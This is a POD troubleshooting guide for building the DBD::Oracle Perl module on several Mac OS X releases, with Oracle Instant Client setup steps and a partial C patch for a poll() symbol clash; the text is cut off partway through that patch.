In this chapter, you’ll invest a small amount of time up front to get familiar with a quick, foolproof way to build and run Clojure programs. It feels great to get a real program running. Reaching that milestone frees you up to experiment, share your work, and gloat to your colleagues who are still using last decade’s languages. This will help keep you motivated!
You’ll also learn how to instantly run code within a running Clojure process using a Read-Eval-Print Loop (REPL), which allows you to quickly test your understanding of the language and learn more efficiently.
But first, I’ll briefly introduce Clojure. Next, I’ll cover Leiningen, the de facto standard build tool for Clojure. By the end of the chapter, you’ll know how to do the following:
- Create a new Clojure project with Leiningen
- Build the project to create an executable JAR file
- Execute the JAR file
- Execute code in a Clojure REPL
First Things First: What Is Clojure?
Clojure was forged in a mythic volcano by Rich Hickey. Using an alloy of Lisp, functional programming, and a lock of his own epic hair, he crafted a language that’s delightful yet powerful..
When talking about Clojure, though, it’s important to keep in mind the distinction between the Clojure language and the Clojure compiler. The Clojure language is a Lisp dialect with a functional emphasis whose syntax and semantics are independent of any implementation. The compiler is an executable JAR file, clojure.jar, which takes code written in the Clojure language and compiles it to Java Virtual Machine ( JVM) bytecode. You’ll see Clojure used to refer to both the language and the compiler, which can be confusing if you’re not aware that they’re separate things. But now that you’re aware, you’ll be fine.
This distinction is necessary because, unlike most programming languages like Ruby, Python, C, and a bazillion others, Clojure is a hosted language. Clojure programs are executed within a JVM and rely on the JVM for core features like threading and garbage collection. Clojure also targets JavaScript and the Microsoft Common Language Runtime (CLR), but this book only focuses on the JVM implementation.
We’ll explore the relationship between Clojure and the JVM more later on, but for now the main concepts you need to understand are these:
- JVM processes execute Java bytecode.
- Usually, the Java Compiler produces Java bytecode from Java source code.
- JAR files are collections of Java bytecode.
- Java programs are usually distributed as JAR files.
- The Java program clojure.jar reads Clojure source code and produces Java bytecode.
- That Java bytecode is then executed by the same JVM process already running clojure.jar.
Clojure continues to evolve..
Now that you know what Clojure is, let’s actually build a freakin’ Clojure program!
Leiningen
These days, most Clojurists use Leiningen to build and manage their projects. You can read a full description of Leiningen in Appendix A, but for now we’ll focus on using it for four tasks:
- Creating a new Clojure project
- Running the Clojure project
- Building the Clojure project
- Using the REPL
Before continuing, make sure you have Java version 1.6 or later installed. You can check your version by running
java -version in your terminal, and download the latest Java Runtime Environment (JRE) from. Then, install Leiningen using the instructions on the Leiningen home page at (Windows users, note there’s a Windows installer). When you install Leiningen, it automatically downloads the Clojure compiler, clojure.jar.
Creating a New Clojure Project
Creating a new Clojure project is very simple. A single Leiningen command creates a project skeleton. Later, you’ll learn how to do tasks like incorporate Clojure libraries, but for now, these instructions will enable you to execute the code you write.
Go ahead and create your first Clojure project by typing the following in your terminal:
This command should create a directory structure that looks similar to this (it’s okay if there are some differences):
| .gitignore | doc | | intro.md ➊ | project.clj | README.md ➋ | resources | src | | clojure_noob ➌ | | | core.clj ➍ | test | | clojure_noob | | | core_test.clj
This project skeleton isn’t inherently special or Clojure-y. It’s just a convention used by Leiningen. You’ll be using Leiningen to build and run Clojure apps, and Leiningen expects your app to have this structure. The first file of note is project.clj at ➊, which is a configuration file for Leiningen. It helps Leiningen answer such questions as “What dependencies does this project have?” and “When this Clojure program runs, what function should run first?” In general, you’ll save your source code in src/<project_name>. In this case, the file src/clojure_noob/core.clj at ➌ is where you’ll be writing your Clojure code for a while. The test directory at ➍ obviously contains tests, and resources at ➋ is where you store assets like images.
Running the Clojure Project
Now let’s actually run the project. Open src/clojure_noob/core.clj in your favorite editor. You should see this:
➊ (ns clojure-noob.core (:gen-class)) ➋ (defn -main "I don't do a whole lot...yet." [& args] ➌ (println "Hello, World!"))
The lines at ➊ declare a namespace, which you don’t need to worry about right now. The
-main function at ➋ is the entry point to your program, a topic that is covered in Appendix A. For now, replace the text
"Hello,
World!" at ➌ with
"I'm a little teapot!". The full line should read
(println "I'm a little teapot!")).
Next, navigate to the clojure_noob directory in your terminal and enter:
lein run
You should see the output
"I'm a little teapot!" Congratulations, little teapot, you wrote and executed a program!
You’ll learn more about what’s actually happening in the program as you read through the book, but for now all you need to know is that you created a function,
-main, and that function runs when you execute
lein run at the command line.
Building the Clojure Project
Using
lein run is great for trying out your code, but what if you want to share your work with people who don’t have Leiningen installed? To do that, you can create a stand-alone file that anyone with Java installed (which is basically everyone) can execute. To create the file, run this:
lein uberjar
This command creates the file target/uberjar/clojure-noob-0.1.0-SNAPSHOT-standalone.jar. You can make Java execute it by running this:
java -jar target/uberjar/clojure-noob-0.1.0-SNAPSHOT-standalone.jar
Look at that! The file target/uberjar/clojure-noob-0.1.0-SNAPSHOT-standalone.jar is your new, award-winning Clojure program, which you can distribute and run on almost any platform.
You now have all the basic details you need to build, run, and distribute (very) basic Clojure programs. In later chapters, you’ll learn more details about what Leiningen is doing when you run the preceding commands, gaining a complete understanding of Clojure’s relationship to the JVM and how you can run production code.
Before we move on to Chapter 2 and discuss the wonder and glory of Emacs, let’s go over another important tool: the REPL.
Using the REPL
The REPL is a tool for experimenting with code. It allows you to interact with a running program and quickly try out ideas. It does this by presenting you with a prompt where you can enter code. It then reads your input, evaluates it, prints the result, and loops, presenting you with a prompt again.
This process enables a quick feedback cycle that isn’t possible in most other languages. I strongly recommend that you use it frequently because you’ll be able to quickly check your understanding of Clojure as you learn. Besides that, REPL development is an essential part of the Lisp experience, and you’d really be missing out if you didn’t use it.
To start a REPL, run this:
lein repl
The output should look like this:
nREPL server started on port 28925 REPL-y 0.1.10 Clojure 1.9") clojure-noob.core=>
The last line,
clojure-noob.core=>, tells you that you’re in the
clojure
-noob.core namespace. You’ll learn about namespaces later, but for now notice that the namespace basically matches the name of your src/clojure_noob/core.clj file. Also, notice that the REPL shows the version as Clojure 1.9.0, but as mentioned earlier, everything will work okay no matter which version you use.
The prompt also indicates that your code is loaded in the REPL, and you can execute the functions that are defined. Right now only one function,
-main, is defined. Go ahead and execute it now:
clojure-noob.core=> (-main) I'm a little teapot! nil
Well done! You just used the REPL to evaluate a function call. Try a few more basic Clojure functions:
clojure-noob.core=> (+ 1 2 3 4) 10 clojure-noob.core=> (* 1 2 3 4) 24 clojure-noob.core=> (first [1 2 3 4]) 1
Awesome! You added some numbers, multiplied some numbers, and took the first element from a vector. You also had your first encounter with weird Lisp syntax! All Lisps, Clojure included, employ prefix notation, meaning that the operator always comes first in an expression. If you’re unsure about what that means, don’t worry. You’ll learn all about Clojure’s syntax soon.
Conceptually, the REPL is similar to Secure Shell (SSH). In the same way that you can use SSH to interact with a remote server, the Clojure REPL allows you to interact with a running Clojure process. This feature can be very powerful because you can even attach a REPL to a live production app and modify your program as it runs. For now, though, you’ll be using the REPL to build your knowledge of Clojure syntax and semantics.
One more note: going forward, this book will present code without REPL prompts, but please do try the code! Here’s an example:
(do (println "no prompt here!") (+ 1 3)) ; => no prompt here! ; => 4
When you see code snippets like this, lines that begin with
; => indicate the output of the code being run. In this case, the text
no prompt here should be printed, and the return value of the code is
4.
Clojure Editors
At this point you should have the basic knowledge you need to begin learning the Clojure language without having to fuss with an editor or integrated development environment (IDE). But if you do want a good tutorial on a powerful editor, Chapter 2 covers Emacs, the most popular editor among Clojurists. You absolutely do not need to use Emacs for Clojure development, but Emacs offers tight integration with the Clojure REPL and is well-suited to writing Lisp code. What’s most important, however, is that you use whatever works for you.
If Emacs isn’t your cup of tea, here are some resources for setting up other text editors and IDEs for Clojure development:
- This YouTube video will show you how to set up Sublime Text 2 for Clojure development:.
- Vim has good tools for Clojure development. This article is a good starting point:.
- Counterclockwise is a highly recommended Eclipse plug-in:.
- Cursive Clojure is the recommended IDE for those who use IntelliJ:
- Nightcode is a simple, free IDE written in Clojure:.
Summary
I’m so proud of you, little teapot. You’ve run your first Clojure program! Not only that, but you’ve become acquainted with the REPL, one of the most important tools for developing Clojure software. Amazing! It brings to mind the immortal lines from “Long Live” by one of my personal heroes:
You held your head like a hero
On a history book page
It was the end of a decade
But the start of an age
—Taylor Swift
Bravo! | https://www.braveclojure.com/getting-started/ | CC-MAIN-2019-04 | refinedweb | 2,012 | 64.91 |
On 2/23/13 6:52 PM, Ben Abbott wrote: > > On Feb 23, 2013, at 5:24 PM, Alexander Hansen wrote: > >> On 2/23/13 2:43 PM, Ben Abbott wrote: >>> On Feb 23, 2013, at 4:36 PM, Alexander Hansen wrote: >>> >>>> On 2/23/13 2:07 PM, Ben Abbott wrote: >>>>> On Feb 23, 2013, at 11:11 AM, Alexander Hansen wrote: >>>>> >>>>>> #Test case: >>>>>> >>>>>> A(1:512,1:512)=0; >>>>>> A(256-10:256+10,256-10:256+10)= 255; >>>>>> >>>>>> #then either >>>>>> >>>>>> imagesc(A) >>>>>> >>>>>> #or >>>>>> >>>>>> image(A) >>>>>> >>>>>> I saw the bug reports about this issue: >>>>>> >>>>>> >>>>>> >>>>>> >>>>>> >>>>>> but apparently it wasn't fixed. >>>>>> >>>>>> Is there a workaround other than changing the plot terminal? >>>>> >>>>> Not a desirable solution .... but did you try to revert to an earlier >>>>> version of gnuplot? >>>>> >>>>> Ben >>>> >>>> No, because I didn't have one handy. This was in response to a bug >>>> report against what we currently have in the Fink distribution (well, >>>> really against Octave-3.6.3, since this was just before I added 3.6.4), >>>> and I gave the OP the links as well as suggesting changing the terminal >>>> type as a workaround. >>>> >>>> I'd rather not downgrade gnuplot globally unless I absolutely have to, >>>> since other packages use it besides Octave. >>> >>> I did try to patch Octave gnuplot code to append "failsafe" to the plot >>> command, but found that gnuplot would hang for your example. >>> >>> Sorry, I don't have a work around, but I'll give some more thought to it. >>> >>> Ben >> >> It wasn't hard to make up a package description for gnuplot-4.6.0, and >> the test case worked using that. >> >> Since I've got a ludicrously large gnuplot namespace (10 package names) >> already, I don't think I'll make up separate gnuplot-4.6.0 packages. >> It's easy enough for me to add 4.6.0 back as an additional option and to >> tell folks about the problem and workarounds in the user-visible package >> information for our Octave packages. > > I let the gnuplot developers know. > > > > Ethan Merritt has suggested we try to revert the patch below. > > > > > Do you have time to confirm that will fix the problem? > > Ben > Yeah, reverting that fixed the issue. -- Alexander Hansen, Ph.D. Fink User Liaison My package updates: | http://lists.gnu.org/archive/html/help-octave/2013-02/msg00556.html | CC-MAIN-2014-15 | refinedweb | 379 | 73.27 |
Table of Contents
Virtual Machine
Summary
This virtual machine has been built to allow Developers to get operational quickly:
It is in the Open Virtual Machine format for use in either VirtualBox or VMWare.
It is currently running the Ubuntu 10.04 OS with Web2Py-r2717, Eden-r1560 & Eclipse 3.5 (this needs confirmed)
Download
409Mb OVF format for VirtualBox:
385MB Vmx format for VMWare:
Original source site with the original patches available here, along with documentation and usage notes.
Usage Notes
Important
It's been reported that VMs derived from patched ISOs, as these have, may have network problems. Read this article to work the solution. Contact us if you still have problems. There's no way for us to test whether there will be problems in your case.
Introduction
The dev env virtual machines for Virtualbox and VMware are based on a blueprint and are configured to use about 512MB of RAM. The virtual disk is configured to expand to 20GB. The virtual machine is built on TurnKey Linux's Core, which in turn is based on Ubuntu 10.04 (Lucid -- the most recent long-term support release). The machine runs Shellinabox, Webmin, and SSH/sftp as services from startup.
The development environment is configured to launch LXDE, a lightweight desktop environment after the first boot. From LXDE, Eclipse with Pydev, Firefox with Firebug, iPython and irssi are accessible.
Getting Started
- Download the Image
- Uncompress the image: 7zip is a very effective FOSS tool for systems running Microsoft OSs. In Linux distros, the following command should work:
tar xvzf eden-dev-env.tar.gz (for example) #extract to current working directory
To run the image, you need to install either VirtualBox or VMWare:
VirtualBox Installation
- Download VirtualBox
- Install VirtualBox
- Import the Virtual Appliance:
- File menu | Import Appliance
- Click on the Choose button and navigate to and select the uncompressed image (the .ovf file)
- Accept the default appliance options unless you have a reason to make a specific change
- The VM will appear in the left window pane, and the settings will appear in the right. Scroll down on the right side until you see "Network." Click network to specify the NIC (e.g. switch to wireless) and choose between bridged and NAT mode.
- Start the Virtual Appliance by double-clicking the icon on the left.
Troubleshooting VirtualBox
Network Configuration
Solutions will be here.
Import Fails
Scenario
After first step of import, VirtualBox OSE 3.1.6 reports the following: "Failed to import appliance /path/to/appliance/NewDev.ofg. Too many IDE controllers in OVF; import facility only supports one."
First Solution:
- File | Virtual Machine Manager: Select the hard disks tab and press add disk icon. Browse to and select NewDev.vmdk. Click OK.
- Click the New icon. Click next. Name: NewDev; Operating System: Linux; Version: Ubuntu. Click next.
- Base Memory Size: 384MB. Click Next.
- Select "Use Existing Hard Disk"; choose NewDev.vmdk. Click Next. Click finish.
- Selct NewDev on the left; scroll down to network on the right. Ensure the appropriate network adapter and settings for your circumstances are selected.
Boot Process Halts
Scenario
When started in VirtualBox OSE 3.1.6, NewDev boot process halts at "Starting Initialization Hooks".
Solution
VMWare Installation
Import
To import the download VM into VMware (e.g. Fusion), use the following steps.
- File > New
- Click Continue without disc
- Select Use an existing virtual disk
- Select NewDev.vmdk
- Select Make a separate copy of the virtual disk
- Click Choose
- Click Continue
- OS=Linux and Version=Ubuntu should be selected, click Continue, Click Finish
-
VMWware Converter Version 4.0.1: "Cannot be deployed on the target hardware"
VMware Player 3.1.1 (Ubuntu)
No File|Import option. Nor can one build a VM with a preexisting VMDK.
VMware Workstation 7.1.1
- File | New | Virtual Machine
- Custom, click Next
- Workstation 7.x, click Next
- I will install the operating system later, click Next
- Name: !NewVM; Location: /path/to/virtualmachines/; click Next; click Next.
- 360 MP; click Next
- Select appropriate network connection for your scenario (bridged or NAT), click Next.
- LSI Logic, click Next.
- Use an existing virtual disk; click Next.
- Browse to NewDev.vmdk; click Next.
- Finish; Close.
- Press the play icon or "Power on this virtual machine"..
Web2py administration password is set during the debugging process with either of the following commands and arguments, both of which would set the admin password to "admin":
/home/dev/web2py.py -a admin -i 127.0.0.1 -p 80 /home/dev/web2py.py --password admin -i 127.0.0.1 -p 80
User Accounts
Credentials for the previous version:
Credentials for the current version should be set on first boot: Root password is set through a dialog box on first boot. The user named dev should be set from the command line when first boot is complete with the command passwd dev.
Scenario
Neither user can log in to LXDE with the credentials provided. However, both users can login with the password eden in single-user mode / at the command line interface.
Solution
Pending
Secure the System
Change the default passwords to secure the system. Log in as dev, start LXTerminal, and enter the following commands to change passwords:
sudo passwd root #interactive change root password passwd #Interactive change dev password
It's also important to keep get security updates from online; login as dev and execute the following:
sudo apt-get update sudo apt-get upgrade
Filesystem
Web2py is located in /home/web2py. Eden is located in /home/web2py/applications/eden. Eclipse and PyDev are preconfigured with this information.
Scripts
/usr/local/bin contains three helpful scripts. To run them, start LXTerminal (in the accessories menu) and simply enter the commands as demonstrated below. They are in all users' paths, so may be executed from any working directory.
Update web2py
Enter the command with or without a revision number, as demonstrated below:
update_web2py 2717 #updates web2py to rev 2717 update_web2py #updates web2py to recent revision
Import Eden
update_eden 1560 #updates Eden to rev 1560 update_eden #updates Eden to recent revision
Update Eden
Imports Eden to Web2py
import #imports models to web2py
Troubleshooting older Releases
Note: If you get a ticket when running the application for the 1st time with a message like "OperationalError: Cannot add a UNIQUE column" then you need to stop the debugger, delete the contents of the databases folder & then start debugging again (there was an old database accidentally left on the system which cannot be auto-migrated - a new image without this issue has been uploaded):
rm -rf ~/Desktop/web2py/applications/eden/databases/*
If you get an error like "AttributeError: SQLCustomType instance has no attribute 'startswith'" then:
cd ~/Desktop/web2py/gluon rm sql.py wget
Then can proceed as above: Stop Eclipse, empty databases folder & restart Eclipse
A new image without this issue has now been uploaded.
InstallationGuidelinesVirtualMachineMaintenance
InstallationGuidelinesDeveloper | https://eden.sahanafoundation.org/wiki/InstallationGuidelinesVirtualMachine?version=106 | CC-MAIN-2022-05 | refinedweb | 1,139 | 56.25 |
I was hoping to ask a pretty simple question. I have come across the below code and have not been able to find a decent explanation as to:
.attrs
['href']
from urllib.request import urlopen
from bs4 import BeautifulSoup
html = urlopen("url")
bsObj = BeautifulSoup(html)
for link in bsObj.findAll("a"):
if 'href' in link.attrs:
print (link.attrs['href'])
Let's try to fetch this question it self and see:
from urllib.request import urlopen from bs4 import BeautifulSoup html = urlopen("") bsObj = BeautifulSoup(html)
i) what exactly does the .attrs function do in this code
In [6]: bsObj.findAll("a")[30] Out[6]: <a class="question-hyperlink" href="/questions/39308028/beautifuelsoup-python">Beautifuelsoup - Python</a> In [7]: bsObj.findAll("a")[30].attrs Out[7]: {'class': ['question-hyperlink'], 'href': '/questions/39308028/beautifuelsoup-python'} In [8]: type(bsObj.findAll("a")[30]) Out[8]: bs4.element.Tag
If you read the documentation, you will notice that a tag may have any number of attributes. In the element number 30, the tag has attributes 'class' and 'href'
ii) what is the function of the ['href'] part at the end
In [9]: bsObj.findAll("a")[30]['href'] Out[9]: '/questions/39308028/beautifuelsoup-python'
If you look at the above output, you will see that the tag had an attribute 'href' and the above code fetched us the value for that attribute. | https://codedump.io/share/UKtDxMH6wkAe/1/beautiful-soup---python | CC-MAIN-2017-09 | refinedweb | 227 | 59.3 |
import certificate via keytool To import downloaded on step 1 certificate on Windows PC run as administrator cmd and vpn uk free android type: keytool -import -alias alias -keystore C:Progra1AndroidAndroid Studio3.0jrejrelibsecuritycacerts -file path_to/certificate_file Also, you may use web-browser or openssl.
Vpn uk free android
a user based voting system along with very active user community give the major advantage vpn uk free android to this website over other torrent sites which act just as an Index.
this limitation is going to be removed in vpn uk free android future releases. Sample VPN profileXML Following is the sample VPN profileXML.
Vpn uk free android in USA and United Kingdom!
after you complete Psiphon download, free and open-sourced The Psiphon 3 app and all vpn uk free android its fundamental products are open-source and free to use. This feature represents the liberty provided by the developers; hence, you would enjoy the internet browsing activities to its complete extent.
torGuard offers a handful of servers that work with the aforementioned Cisco AnyConnect environment. This is probably what you've used. Or have ever needed to connect to a work network on top ssl vpn solutions your Chromebook, if you have a Chromebook from work,
s..
the Reef needs a vpn vpn uk free android sverige ipad gratis stronger champion to defend it 1 last update from industrialisation, overfishing and a vpn sverige ipad gratis multitude of other vpn sverige ipad gratis threats.
click on vpn uk free android the (X)) button seen in the image before the url. Note: If you need to remove an exception you made, it will now not block any images on that exact url but block images everywhere else on the same website.dDNS, iGMP v1/v2/v3, vPN. DNS Proxy, port Trigger, vpn uk free android nTP Client, tP-LINK TL-WR842N,. Virtual Server,
feel free vpn uk free android to send us your questions and feedback on, in our discussion forums, all the lists of alternatives are crowd-sourced, that's right, and that's what makes the data powerful and relevant.just open the program and click vpn uk free android on the connect button. Tunnel light - Best VPN master is a stable application that will help you deal with any kind of blocking. You no longer need to change anything in your settings,like the Salah al-Burki Brigade, some groups in Tripoli, have refused vpn uk free android to accept the authority of the GNA.
Vagrant host vpn:
now one thing that annoys me a bit where there vpn uk free android are ads for a fortune teller on Cath-info who is dressed as a priest. Those sponsored links dont seem to get blocked by basic adblocking tools.
the route can be provided either for your network alone or for all the traffic. Forwarding routes Provide the forwarding route to send the traffic through vpn uk free android the VPN interface to the destination. Based on the Connection Type selected,proxy, or unblocker service. Because our content library can vary vpn uk free android by region and these types of connections are frequently used to bypass geolocation methods, you seem to be using an unblocker or proxy It indicates that our systems have detected that you are connecting via a VPN,
additionally, you can also avoid annoying censorship and access to any website or app that was originally blocked in your network. VPN to effective route their www proxy tunnel internet traffic to the game server. Since youre behind a virtual network, as for vpn uk free android gaming purpose, gamers use.
find it vpn uk free android in the list of Add-ons and click Enable, how to remove extensions and themes Shortcut: If an add-on is on your toolbar, to re-enable the add-on, then restart Firefox if required.if you had another machine to act as the vpn uk free android VPN client, privoxy) for the rest of your network, and that includes any attempt to use a local proxy! AND that machine also established a proxy (e.g.,) but all is not lost once you understand WHY you cant do it.
with VPN, but also to your community of partners, technologyno small vpn uk free android business can succeed without it. Suppliers, and customers. Your network not only provides secure connectivity to your employees, you can secure setup free vpn server mac your network and also offer secure access to remote partners and employees. | http://babyonboard.in/pacifiers-all-you-need-to-know/vpn-uk-free-android.html | CC-MAIN-2019-39 | refinedweb | 754 | 58.82 |
ChannelArchiver I/O Libraryindex.htm: Class Reference.
PurposeAll Channel Archiver Tools are based on this I/O library. Currently it supports these data storage formats:
- BinArchive: A binary archive of interlinked files.
For maintaining these files, see the cardminer tool as well as the ArchiveManager documentation.
- MultiArchive: A set of BinArchives. See doc/libio/MultiArchive.h
- Possible future ideas: some SDDS-based format, an RDB interface, etc.
Coding standards
Class designI tried to follow the suggestions of Meyers' Effective C++ books and also aim to keep the I/O library open for replacement of the data file format. Please note that this tends to bloat the code a bit. Example: A number in a C program could be defined as simplyfloat number;In a hardcore C++ program on the other hand this turns intoclass Number : public ObjectTreeRoot { Number (float number) { _number = number; } float get () { return _number; } void set (float number) { _number = number; } ostream & << (ostream &o) { o << _number; return o; } private: float _number; };This is comparably more code. The advantage is that it allows for transparent changes of the number's type. If all inlined, the C++ code needn't be slower nor will the object code be bigger. But it sure is more source code. And I didn't even use an abstract number base class...
To remain reasonable, this standard is not applied to each "number" but it is being followed for the Archive, Channel and Value related I/O classes. This already kept the Manager, CGIExport and casi tools independent from the used Archive type (BinArchive or MultiArchive).
Layout.htm explains the class layout in more detail, index.htm is a commented Class Reference generated from the header files.
Standard C++ libraryThe standard C++ library as defined in the 1997 Stroustrup book contains string, list, map, exception, ... classes. It is used whenever possible to prevent reinvention. While there are some similar classes in EPICS base, those are not used because they don't constitute as complete a suite.
Unfortunately, std::string showed a memory leak with RedHat 6.1 (that version of egcs g++ to be specific). Tools/stdString was introduced as a replacement. It can be used like std::string but implements only what was necessary so far.
NamespacesWhenever possible, code it enclosed in a namespace Tools or ChanArch. For MS Visual C++ this is even required because of conflicts with the "list" definition in resourceLib.h. It can be disabled via a #define in ToolsConfig.h. | http://www.slac.stanford.edu/grp/cd/soft/epics/extensions/ChannelArchiver/libio/default.htm | crawl-003 | refinedweb | 410 | 57.37 |
- NAME
- VERSION
- General Info
- Instructions for 10.7.x (Lion)
- Instructions for 10.6.x (Snow Leopard)
- Instructions for 10.2.x (Jaguar)
- Instructions for 10.3.x (Panther)
- AUTHORS
NAME
DBD::Oracle::Troubleshooting::Macos - Tips and Hints to Troubleshoot DBD::Oracle on MacOs
VERSION
version 1.74
General Info
These instructions allow for the compilation and successful testing of DBD::Oracle on MacOS X 10.2.4 and higher, using Oracle 9iR2 DR (Release 9.2.0.1.0) or the 10g Instant Client release (10.1.0.3 at the time of writing).
MacOS X DBD::Oracle has been tested (and used) under Jaguar (10.2.x), Panther (10.3.x), Snow Leopard (10.6.x), Lion (10.7.x). Jaguar comes with a Perl version of 5.6.0., which I can report to work with DBD::Oracle 1.14 and higher once you take certain steps (see below). You may want to install a later perl, e.g., Perl 5.8.x. Please refer to:
Installing Perl 5.8 on Jaguar
for Perl 5.8.0 installation instructions.
DBD::Oracle is likely to not install out of the box on MacOS X 10.2. nor on 10.3. Manual but different changes will most likely be required on both versions.
The key problem on 10.2. (Jaguar) is a symbol clash (caused by a function poll() named identically) between the IO library in at least Perl 5.6.0 (which is the version that comes with 10.2) and the Oracle client library in 9iR2 developer's release for MacOS X. The symptom is that your build appears to compile fine but then fails in the link stage. If you are running a (possibly self-installed) version of Perl other than 5.6.0, there's a chance that you are not affected by the symbol clash. So, try to build first without any special measures, and only resort to the instructions below if your build fails in the link stage with a duplicate symbol error. Note: if it fails to even compile, solve that problem first since it is not due to the symbol clash.
The key problem on 10.3 (Panther) is that the default perl that comes with the system is compiled with multi-threading turned on, which at least with the 9iR2 developer's release exposes a memory leak. Your DBD::Oracle build will compile, test, and install fine, but if you execute the same prepared statement multiple times, the process will quickly run up hundreds of megabytes of RAM, and depending on how much memory you have it will die sooner or later.
Oracle recently released an "Instant Client" for MacOSX 10.3 (Panther), which as far as I can attest has none of the problems above. Since it is also a very compact download (actually, a series of downloads) I highly recommend you install and use the Instant Client if you are on 10.3 (Panther) and you do not intend to run the Oracle database server on your MacOSX box. See below (Instructions for 10.3.x) for details.
Instructions for 10.7.x (Lion)
Perl on Lion and later is built with 64-bit support, and therefore requires the 64-bit Instant Client. As of this writing, only Instant Client 11.2 (64-bit) actually works. The 64-bit Instant Client 10.2 is incompatible with Lion. We therefore recommend the 11.2 client. If you must Instant Client 10.2, you may need to recompile Perl with 32-bit support.
Either way, setup and configuration is the same:
Download and install the basic, sqlplus, and sdk instantclient libraries and install them in a central location, such as /usr/oracle_instantclient. Downloads here
Create a symlink from libclntsh.dylib.10.1 to libclntsh.dylib:
cd /usr/oracle_instantclient/ ln -s libclntsh.dylib.* libclntsh.dylib ln -s libocci.dylib.* libocci.dylib
Update your environment to point to the libraries:
export ORACLE_HOME=/usr/oracle_instantclient export DYLD_LIBRARY_PATH=$DYLD_LIBRARY_PATH:/usr/oracle_instantclient
You should now be able to install DBD::Oracle from CPAN:
cpan DBD::Oracle
Instructions for 10.6.x (Snow Leopard)
These are taken from a stackoverflow answer by "nickisfat" who gave his/her permission for its inclusion here. You can see the original question and answers at.
Getting a mac install of perl to play nicely with oracle is a bit of a pain - once it's running it is fantastic, getting it running is a little frustrating..
The below has worked for me on a few different intel macs, there could well be superfluous steps in there and it is likely not going to be the same for other platforms.
This will require use of shell, the root user and a bit of CPANing - nothing too onerous
First off create a directory for the oracle pap - libraries, instant client etc
sudo mkdir /usr/oracle_instantClient64
Download and extract all 64 bit instant client packages from oracle to the above directory
Create a symlink within that directory for one of the files in there
sudo cd /usr/oracle_instantClient64 sudo ln -s /usr/oracle_instantClient64/libclntsh.dylib.10.1 libclntsh.dylib
The following dir is hardcoded into the oracle instant client - god knows why - so need to create and symlink it
sudo mkdir -p /b/227/rdbms/ sudo cd /b/227/rdbms/ sudo ln -s /usr/oracle_instantClient64/ lib
Need to add a couple of environment variables, so edit /etc/profile and add them so they exist for all users:
export ORACLE_HOME=/usr/oracle_instantClient64 export DYLD_LIBRARY_PATH=/usr/oracle_instantClient64
Now try and install DBD::Oracle through CPAN - this will fail, but it means any dependencies will be downloaded and it retrieves the module for us
sudo perl -MCPAN -e shell install DBD::Oracle
When this fails exit CPAN and head to your .cpan/build dir - if you used automatic config of CPAN it'll be
cd ~/.cpan/build
if you didn't auto configure you can find your build directory with the following command in CPAN
o conf build_dir
Once in the build dir look for the DBD::Oracle dir which has just been created (it'll be called something like DBD-Oracle-1.28-?) and cd into it.
Now we need to switch to the root user. Root isn't enabled as default in osx - for details on enabling see this post on the apple website
Once logged in as root we need to set the above environment variables for root:
export ORACLE_HOME=/usr/oracle_instantClient64 export DYLD_LIBRARY_PATH=/usr/oracle_instantClient64
Now while still logged in as root we need to run the makefile for the module, then make, then install
perl Makefile.pl make install
Assuming that all worked without error log out of root: we're DBD'd up! If this didn't work it's time to bust out google on whatever errors you're seeing
Now just to install the DBI module
sudo perl -MCPAN -e shell install DBI
Now you're all set - enjoy your perly oracley new life
Instructions for 10.2.x (Jaguar)
1) Install Oracle exactly per Oracle documentation. If you change install locations, then you'll need to modify paths accordingly.
2) There are two ways to remedy the symbol clash. Either edit the symbol table of the Oracle client library $ORACLE_HOME/lib/libclntsh.dylib.9.0 such that the symbol _poll is no longer exported. Alternatively, download, patch, and re-install the perl IO modules. I could not successfully repeat the report for the former, but I did succeed by doing the latter. Instructions for both follow nonetheless.
2a) SKIP IF YOU WANT TO OR HAVE SUCCESSFULLY TRIED 2b). Make a backup copy of the $ORACLE_HOME/lib/libclntsh.dylib.9.0 file, or the file this name points to, since we're about to modify that library. Note that the ".9.0" suffix of the file name is version dependent, and that you want to work with the file pointed to through one or a series of symbolic links rather than any of the symbolic links (e.g., one will be called libclntsh.dylib). As user 'oracle' execute the following command to fix namespace collisions in Oracle's dynamic libraries. nmedit -R ./hints/macos_lib.syms $ORACLE_HOME/lib/libclntsh.dylib.9.0 *** Recall the above caveats regarding the file name. The problem with this is that the version of nm that comes with Jaguar doesn't support the -R flag. I'd be grateful to anyone who can suggest how to edit the symbol table of libraries on MacOS X. 2b) SKIP IF YOU WANT TO OR HAVE SUCCESSFULLY TRIED 2a). In this variant, we will patch the Perl IO modules to change the name of the poll() function, as that is where it is defined. In this case, we do not need to do anything with the Oracle libraries. Follow these steps: - Download the module IO (IO.pm) from CPAN and unpack it. Check the documentation as to whether the version is compatible with your version of Perl; I used v1.20 with Perl 5.6.0 and had success. - The files IO.xs, poll.c, and poll.h need to be patched. Apply the following patches, e.g., by cutting and pasting the marked section into a file perlio.patch and using that file as input for patch: $ patch -p0 < perlio.patch The patch will basically rename the C implementation of poll() to io_poll(). The other patches were necessary to make v1.20 compile with Perl 5.6.0; they may not be necessary with other versions of IO and Perl, respectively. +=+=+=+=+=+=+= Cut after this line diff -c ../IO-orig/IO-1.20/IO.xs ./IO.xs *** ../IO-orig/IO-1.20/IO.xs Mon Jul 13 23:36:24 1998 --- ./IO.xs Sat May 10 15:20:02 2003 *************** *** 205,211 **** ST(0) = sv_2mortal(newSVpv((char*)&pos, sizeof(Fpos_t))); } else { ! ST(0) = &sv_undef; errno = EINVAL; } --- 205,211 ---- ST(0) = sv_2mortal(newSVpv((char*)&pos, sizeof(Fpos_t))); } else { ! ST(0) = &PL_sv_undef; errno = EINVAL; } *************** *** 249,255 **** SvREFCNT_dec(gv); /* undo increment in newRV() */ } else { ! ST(0) = &sv_undef; SvREFCNT_dec(gv); } --- 249,255 ---- SvREFCNT_dec(gv); /* undo increment in newRV() */ } else { ! ST(0) = &PL_sv_undef; SvREFCNT_dec(gv); } *************** *** 272,278 **** i++; fds[j].revents = 0; } ! if((ret = poll(fds,nfd,timeout)) >= 0) { for(i=1, j=0 ; j < nfd ; j++) { sv_setiv(ST(i), fds[j].fd); i++; sv_setiv(ST(i), fds[j].revents); i++; --- 272,278 ---- i++; fds[j].revents = 0; } ! if((ret = io_poll(fds,nfd,timeout)) >= 0) { for(i=1, j=0 ; j < nfd ; j++) { sv_setiv(ST(i), fds[j].fd); i++; sv_setiv(ST(i), fds[j].revents); i++; diff -c ../IO-orig/IO-1.20/poll.c ./poll.c *** ../IO-orig/IO-1.20/poll.c Wed Mar 18 21:34:00 1998 --- ./poll.c Sat May 10 14:28:22 2003 *************** *** 35,41 **** # define 